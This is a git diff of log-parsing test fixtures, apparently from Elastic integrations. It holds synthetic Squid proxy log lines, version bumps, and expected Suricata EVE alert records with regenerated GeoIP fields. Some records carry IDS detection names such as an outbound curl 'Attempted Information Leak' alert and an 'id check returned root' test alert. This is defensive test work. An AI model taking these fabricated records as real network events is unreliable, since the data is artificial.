"version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.216.143.226 2632 [11/Jun/2019:11:51:06 deomn] \"CONNECT https://api.example.net/quido/llo.htm?tpersp=assi#rch psa\" 10.25.53.93 tvolup oremeu \"lab\" lla urau 6127 \"https://example.net/equamni/atcupi.htm?onemull=mdo#labore\" \"Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\" cancel", "event": { - "ingested": "2021-06-08T12:14:42.230480Z" + "ingested": "2021-12-14T14:55:10.058097019Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.139.195.188 893 [25/Jun/2019:6:53:40 aliquaU] \"HEAD https://www.example.net/tvolu/imve.txt?gnaaliq=quam#deriti edictasu\" 10.246.115.57 edquiano mSecti \"henderi\" taevitae tevel 5926 \"https://example.com/ita/iquipexe.jpg?quamqua=quuntur#nihi\" \"Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230483500Z" + "ingested": "2021-12-14T14:55:10.058097384Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.60.56.205 4345 [10/Jul/2019:1:56:14 writtenb] \"NONE https://www5.example.com/ugitsed/dminimve.htm?onse=uiac#tquii tesse\" 10.82.148.126 inBCSedu ita \"ade\" nihilmol nder 2214 \"https://api.example.net/uunturm/iatn.gif?tseddo=diduntut#rroq\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]\" block", "event": { - "ingested": "2021-06-08T12:14:42.230487100Z" + "ingested": "2021-12-14T14:55:10.058097754Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.245.251.98 261 [24/Jul/2019:8:58:48 mremaper] \"DELETE https://api.example.com/ntium/ide.htm?tamrema=isautem#usan gnamali\" 10.6.11.124 edqui tvolu \"psu\" strud onsequ 5930 \"https://www5.example.net/iumto/sequatu.jpg?runtm=mdoloree#que\" \"Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230490500Z" + "ingested": "2021-12-14T14:55:10.058098120Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.99.55.115 1537 [07/Aug/2019:4:01:23 exerci] \"CONNECT https://www5.example.org/iad/ngelits.jpg?mporin=orissusc#utaliqui uov\" 10.145.25.55 litsed lumd \"tiaec\" lorem iamquisn 2079 \"https://mail.example.org/aper/entor.txt?lumdol=edutper#utemve\" \"Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" block", "event": { - "ingested": "2021-06-08T12:14:42.230493900Z" + "ingested": "2021-12-14T14:55:10.058098487Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.187.86.64 3325 [21/Aug/2019:11:03:57 atatn] \"TRACE https://mail.example.com/iatnulap/roi.htm?uine=loreeu#eprehe ddoeiusm\" 10.6.88.105 uptatemU rem \"onorumet\" iscivel rinci 249 \"https://internal.example.com/eriti/uptateve.htm?rema=mcol#tion\" \"Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230497200Z" + "ingested": "2021-12-14T14:55:10.058098848Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.252.146.132 503 [05/Sep/2019:6:06:31 tat] \"CONNECT https://mail.example.org/turv/use.jpg?mtot=macc#illoin eursi\" 10.163.9.35 uatDu umq \"ipsu\" oremip ota 4562 \"https://example.com/epteurs/itse.jpg?modi=cip#tla\" \"Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230500600Z" + "ingested": "2021-12-14T14:55:10.058099212Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.249.101.177 4465 [19/Sep/2019:1:09:05 quam] \"DELETE https://mail.example.com/umdol/rerepr.txt?emipsumq=orinr#ineavol umdo\" 10.235.160.245 squamest upta \"umquiad\" porinc uameiu 4857 \"https://api.example.org/mipsa/uas.gif?reeufu=umexe#xce\" \"Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230503900Z" + "ingested": "2021-12-14T14:55:10.058099582Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.140.170.171 773 [03/Oct/2019:8:11:40 deom] \"TRACE https://internal.example.com/rautod/onorumet.htm?mvo=agnidol#nevolup erspici\" 10.73.218.58 quidol tinv \"Utenima\" nse umq 1831 \"https://mail.example.org/meaquei/snisiu.htm?atev=vento#litsed\" \"Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" block", "event": { - "ingested": "2021-06-08T12:14:42.230507400Z" + "ingested": "2021-12-14T14:55:10.058099955Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.248.156.138 2125 [18/Oct/2019:3:14:14 smodit] \"OPTIONS https://example.net/dun/xce.jpg?nsequat=mvol#asiar eiu\" 10.67.148.40 tcons squamest \"ction\" emveleum siuta 2155 \"https://example.com/epteur/onproi.txt?imveniam=sunte#exerc\" \"Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230510900Z" + "ingested": "2021-12-14T14:55:10.058100319Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.83.154.75 4260 [01/Nov/2019:10:16:48 explicab] \"UNLOCK https://api.example.com/teiru/mquamei.jpg?pta=uradi#sequu orumetMa\" 10.37.33.179 taed eatae \"siutali\" oloremq sum 6106 \"https://www.example.org/ulamc/doe.txt?remquela=toreve#squirat\" \"Mozilla/5.0 (Linux; Android 7.0; MEIZU M6 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230514800Z" + "ingested": "2021-12-14T14:55:10.058100704Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.14.29.202 7842 [15/Nov/2019:5:19:22 modoco] \"MKOL https://www5.example.net/dtempor/rroquisq.gif?liquid=uidex#umdolo nimv\" 10.84.107.38 tutla usmod \"ine\" qui itse 2097 \"https://www5.example.org/tasn/exeaco.html?metc=aincidu#reprehe\" \"Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230518Z" + "ingested": "2021-12-14T14:55:10.058101077Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.221.86.133 6682 [30/Nov/2019:12:21:57 edi] \"POST https://api.example.com/ore/adeser.htm?pre=aute#rchite rcit\" 10.204.223.184 oinve ptasnul \"utaliqui\" mcorpor rerepr 6861 \"https://example.com/tuserror/agnama.jpg?deritq=boreetdo#teni\" \"Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230521500Z" + "ingested": "2021-12-14T14:55:10.058101442Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.195.4.70 3844 [14/Dec/2019:7:24:31 mfugiat] \"PUT https://api.example.com/liqu/dolor.htm?ess=umdo#aer quela\" 10.229.39.190 Nequepo edictas \"emac\" rmagnido exeaco 2574 \"https://api.example.org/loremi/nven.htm?usan=ugiatn#squa\" \"Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230525200Z" + "ingested": "2021-12-14T14:55:10.058101803Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/squid/manifest.yml b/packages/squid/manifest.yml index b49cc6654da..44f2025fd97 100644 --- a/packages/squid/manifest.yml +++ b/packages/squid/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: squid title: Squid Logs -version: 0.6.0 +version: 0.6.1 description: Collect and parse logs from Squid devices with Elastic Agent. categories: ["security"] release: experimental diff --git a/packages/suricata/changelog.yml b/packages/suricata/changelog.yml index 98f101aab26..1079985dd4a 100644 --- a/packages/suricata/changelog.yml +++ b/packages/suricata/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.3.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log-expected.json b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log-expected.json index f4d460235d9..8c53763d6d8 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log-expected.json +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-6-0.log-expected.json @@ -17,19 +17,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -101,7 +96,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:45:19.608432300Z", + "ingested": "2021-12-14T14:55:13.385151134Z", "original": "{\"timestamp\":\"2021-01-27T01:28:11.488362+0100\",\"flow_id\":1805461738637437,\"in_iface\":\"enp6s0\",\"event_type\":\"alert\",\"src_ip\":\"175.16.199.1\",\"src_port\":80,\"dest_ip\":\"10.31.64.240\",\"dest_port\":47592,\"proto\":\"TCP\",\"ether\":{\"src_mac\":\"00:03:2d:3f:e5:63\",\"dest_mac\":\"00:1b:17:00:01:18\"},\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2100498,\"rev\":7,\"signature\":\"GPL ATTACK_RESPONSE id check returned root\",\"category\":\"Potentially Bad Traffic\",\"severity\":2,\"metadata\":{\"created_at\":[\"2010_09_23\"],\"updated_at\":[\"2010_09_23\"]}},\"http\":{\"hostname\":\"testmynids.org\",\"url\":\"/uid/index.html\",\"http_user_agent\":\"curl/7.58.0\",\"http_content_type\":\"text/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP/1.1\",\"status\":200,\"length\":39},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":496,\"bytes_toclient\":876,\"start\":\"2021-01-22T23:28:38.673917+0100\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", diff --git a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-alerts.log-expected.json b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-alerts.log-expected.json index cfc6a2e50d1..9d9fd5d5bf8 100644 --- a/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-alerts.log-expected.json +++ b/packages/suricata/data_stream/eve/_dev/test/pipeline/test-eve-alerts.log-expected.json @@ -80,7 +80,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:45:19.996624600Z", + "ingested": "2021-12-14T14:55:13.788105617Z", "original": "{\"timestamp\":\"2018-10-03T14:42:44.836744+0000\",\"flow_id\":2191386088856669,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32858,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.net\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1121},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T14:42:44.613469+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -182,7 +182,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:45:19.996633900Z", + "ingested": "2021-12-14T14:55:13.788108390Z", "original": "{\"timestamp\":\"2018-10-03T16:16:26.711841+0000\",\"flow_id\":678269478904081,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32864,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.net\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1121},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T16:16:26.467217+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -284,7 +284,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:45:19.996640100Z", + "ingested": "2021-12-14T14:55:13.788108878Z", "original": "{\"timestamp\":\"2018-10-03T16:44:50.813100+0000\",\"flow_id\":1170030461115650,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32870,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.net\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1126},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T16:44:50.580866+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -386,7 +386,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:45:19.996646Z", + "ingested": "2021-12-14T14:55:13.788109227Z", "original": "{\"timestamp\":\"2018-10-03T16:45:09.267308+0000\",\"flow_id\":49628113637132,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32872,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.org\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1121},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T16:45:09.036620+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -488,7 +488,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:45:19.996652100Z", + "ingested": "2021-12-14T14:55:13.788109590Z", "original": "{\"timestamp\":\"2018-10-03T16:45:34.481113+0000\",\"flow_id\":116307482565223,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32876,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.org\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1121},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T16:45:34.252519+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -590,7 +590,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:45:19.996658Z", + "ingested": "2021-12-14T14:55:13.788109939Z", "original": "{\"timestamp\":\"2018-10-03T17:02:38.900976+0000\",\"flow_id\":1205867738178946,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":32892,\"dest_ip\":\"93.184.216.34\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013028,\"rev\":4,\"signature\":\"ET POLICY curl User-Agent Outbound\",\"category\":\"Attempted Information Leak\",\"severity\":2},\"http\":{\"hostname\":\"example.org\",\"url\":\"\\/\",\"http_user_agent\":\"curl\\/7.58.0\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1126},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":347,\"bytes_toclient\":1654,\"start\":\"2018-10-03T17:02:38.599426+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -691,7 +691,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996663900Z", + "ingested": "2021-12-14T14:55:13.788110292Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.009897+0000\",\"flow_id\":764842923400056,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":37742,\"dest_ip\":\"91.189.88.152\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"security.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-security\\/InRelease\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1138},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":497,\"bytes_toclient\":1654,\"start\":\"2018-10-04T09:34:58.924536+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -795,7 +795,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996669800Z", + "ingested": "2021-12-14T14:55:13.788110648Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.168340+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic\\/InRelease\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":304,\"length\":0},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":4,\"pkts_toclient\":3,\"bytes_toserver\":487,\"bytes_toclient\":417,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -899,7 +899,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996675700Z", + "ingested": "2021-12-14T14:55:13.788110995Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.288862+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":1,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"archive.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-updates\\/InRelease\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2601},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":6,\"pkts_toclient\":5,\"bytes_toserver\":842,\"bytes_toclient\":3445,\"start\":\"2018-10-04T09:34:58.926006+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -1003,7 +1003,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996681500Z", + "ingested": "2021-12-14T14:55:13.788111385Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.289324+0000\",\"flow_id\":764842923400056,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":37742,\"dest_ip\":\"91.189.88.152\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":1,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"security.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-security\\/main\\/source\\/by-hash\\/SHA256\\/f5ec03d97ca76c98162d9233c8b7c578c52897e2136428277baf2e7b633a8e72\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":1241},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":64,\"pkts_toclient\":62,\"bytes_toserver\":4810,\"bytes_toclient\":90543,\"start\":\"2018-10-04T09:34:58.924536+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -1107,7 +1107,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996687400Z", + "ingested": "2021-12-14T14:55:13.788111728Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.356132+0000\",\"flow_id\":764842923400056,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":37742,\"dest_ip\":\"91.189.88.152\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":2,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"security.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-security\\/main\\/binary-amd64\\/by-hash\\/SHA256\\/c5b8346a3221bc9a23a79ba4dc4e730a6319a77fc9d63872dfc56539a0810015\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2687},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":87,\"pkts_toclient\":98,\"bytes_toserver\":6591,\"bytes_toclient\":145014,\"start\":\"2018-10-04T09:34:58.924536+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -1211,7 +1211,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996693700Z", + "ingested": "2021-12-14T14:55:13.788112289Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.456919+0000\",\"flow_id\":764842923400056,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":37742,\"dest_ip\":\"91.189.88.152\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":3,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package management\",\"category\":\"Not Suspicious Traffic\",\"severity\":3},\"http\":{\"hostname\":\"security.ubuntu.com\",\"url\":\"\\/ubuntu\\/dists\\/bionic-security\\/universe\\/binary-amd64\\/by-hash\\/SHA256\\/e5cc957139a25a0fee47cbf2c0fac8ad5cab50346d6a74abe031748924c5b558\",\"http_user_agent\":\"Debian APT-HTTP\\/1.3 (1.6.3ubuntu0.1)\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":2688},\"app_proto\":\"http\",\"flow\":{\"pkts_toserver\":156,\"pkts_toclient\":221,\"bytes_toserver\":11460,\"bytes_toclient\":330525,\"start\":\"2018-10-04T09:34:58.924536+0000\"}}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", @@ -1315,7 +1315,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:45:19.996699600Z", + "ingested": "2021-12-14T14:55:13.788112640Z", "original": "{\"timestamp\":\"2018-10-04T09:34:59.747122+0000\",\"flow_id\":112424506237238,\"in_iface\":\"enp0s3\",\"event_type\":\"alert\",\"src_ip\":\"192.168.1.146\",\"src_port\":52340,\"dest_ip\":\"91.189.91.23\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":2,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2013504,\"rev\":5,\"signature\":\"ET POLICY GNU\\/Linux APT User-Agent Outbound likely related to package 